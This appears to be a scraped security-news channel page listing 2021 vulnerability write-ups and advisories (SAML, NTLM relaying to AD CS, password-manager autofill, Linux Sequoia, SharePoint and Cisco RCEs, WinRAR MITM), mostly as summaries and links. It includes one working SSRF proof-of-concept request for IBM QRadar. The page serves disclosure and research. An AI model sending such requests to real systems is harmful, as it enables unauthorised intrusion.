Site wide CSRF using the GraphQL API
Site-wide CSRF using the GraphQL API
SAML is insecure by design by joonas fi
SAML is insecure by design
👤
by @joonas_fi

"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."

📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading

https://joonas.fi/2021/08/saml-is-insecure-by-design/
We would like to share with the community
✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format.

Stored XSS using .xbl files.
NTLM relaying to AD CS On certificates printers
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤
by @_dirkjan

More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.

📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
You should turn off autofill in your password
You should turn off autofill in your password manager
👤
by @marektoth

11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.

📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion

https://marektoth.com/blog/password-managers-autofill/
Cisco fixed a Post Auth RCE CVE 2021
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
Sequoia A Local Privilege Escalation Vulnerability in Linux
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤
by Bharat Jogi

"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."

📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)

https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
CVE 2021 28474 SHAREPOINT RCE VIA SERVER SIDE
CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi

The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.

📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
PoC for SSRF in IBM QRadar SIEM CVE
PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)

GET /console/chartServer?output=image&data=http://127.0.0.1:8080
RARLAB fixed a MITM CVE 2021 35052 in
RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy.

This attack could be leveraged to achieve code execution on a user's machine.

Advisory: https://win-rar.com/singlenewsview.html?L=0&tx_ttnews%5Btt_news%5D=165&cHash=1

2819099

Каналов

109137067

Сообщений